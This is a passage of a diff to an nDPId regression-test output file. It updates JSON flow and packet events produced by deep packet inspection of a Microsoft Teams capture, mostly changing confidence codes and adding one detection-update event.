@@ -499,102 +507,103 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2730,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1587041697061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041697061,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGxpHAqAEGKE+KKeyYAbtVmTcwAAAAALAC\/\/8wcwAAAgQFtAEDAwUBAQgKMITmwQAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2731,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1587041697091,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041697091,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8X+VAAG4GOLAoT4opwKgBBgG77Jhhqm+9VZk3MaASIADeAQAAAgQFoAEDAwgEAggKC\/ZmGDCE5sE="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2732,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1587041697091,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041697091,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxp3AqAEGKE+KKeyYAbtVmTcxYapvvoAQEAkclQAAAQEICjCE5t4L9mYY"} 
-00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2733,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041697061,"flow_last_seen":1587041697092,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041697092,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2733,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041697061,"flow_last_seen":1587041697092,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041697092,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
+00896{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2734,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041697061,"flow_last_seen":1587041697123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1679,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1587041697123,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 00185{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2753,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041697412} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":2753,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041697244,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2761,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041697611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2761,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041697604,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 
00548{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2767,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041697660,"flow_last_seen":1587041697660,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041697660,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2767,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1587041697660,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1587041697660,"pkt":"KDc3AG3IEBMx8Tl2CABFoAA40fgAADUBJWpdR27NwKgBBgMDcCsAAAAARQAASh2AAAAyEd1gwKgBBl1Hbs3DdD\/NADaJWQ=="} -00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2767,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041697660,"flow_last_seen":1587041697660,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041697660,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.321296} 
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2767,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041697660,"flow_last_seen":1587041697660,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041697660,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.321296} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2774,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1587041697673,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1587041697673,"pkt":"KDc3AG3IEBMx8Tl2CABFoAA4akMAADUBjR9dR27NwKgBBgMDcBsAAAAARQAAWp4wAAAyEVygwKgBBl1Hbs3DdD\/NAEaJWQ=="} -00931{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041693828,"flow_last_seen":1587041694047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6930,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00824{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041693516,"flow_last_seen":1587041695435,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1587041693582,"flow_last_seen":1587041694243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":220,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041697660,"flow_last_seen":1587041697673,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00930{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1587041693849,"flow_last_seen":1587041697765,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7358,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 
-00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1587041676435,"flow_last_seen":1587041676536,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":12621,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1300,"flow_first_seen":1587041677243,"flow_last_seen":1587041697130,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":750126,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041682144,"flow_last_seen":1587041685098,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9034,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1587041685240,"flow_last_seen":1587041685471,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":30424,"flow_avg_l4_payload_len":585,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041685984,"flow_last_seen":1587041686156,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8124,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 
-00810{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1587041695278,"flow_last_seen":1587041696498,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50016,"dst_port":50005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} +00931{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041693828,"flow_last_seen":1587041694047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6930,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 
+00824{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041693516,"flow_last_seen":1587041695435,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00824{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1587041693582,"flow_last_seen":1587041694243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":220,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 
+00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041697660,"flow_last_seen":1587041697673,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00930{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1587041693849,"flow_last_seen":1587041697765,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7358,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1587041676435,"flow_last_seen":1587041676536,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":12621,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1300,"flow_first_seen":1587041677243,"flow_last_seen":1587041697130,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":750126,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041682144,"flow_last_seen":1587041685098,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9034,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1587041685240,"flow_last_seen":1587041685471,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":30424,"flow_avg_l4_payload_len":585,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041685984,"flow_last_seen":1587041686156,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8124,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 
+00810{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1587041695278,"flow_last_seen":1587041696498,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50016,"dst_port":50005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1587041687745,"flow_last_seen":1587041687963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9450,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681744,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} -00810{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1587041695278,"flow_last_seen":1587041696498,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50036,"dst_port":50020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 
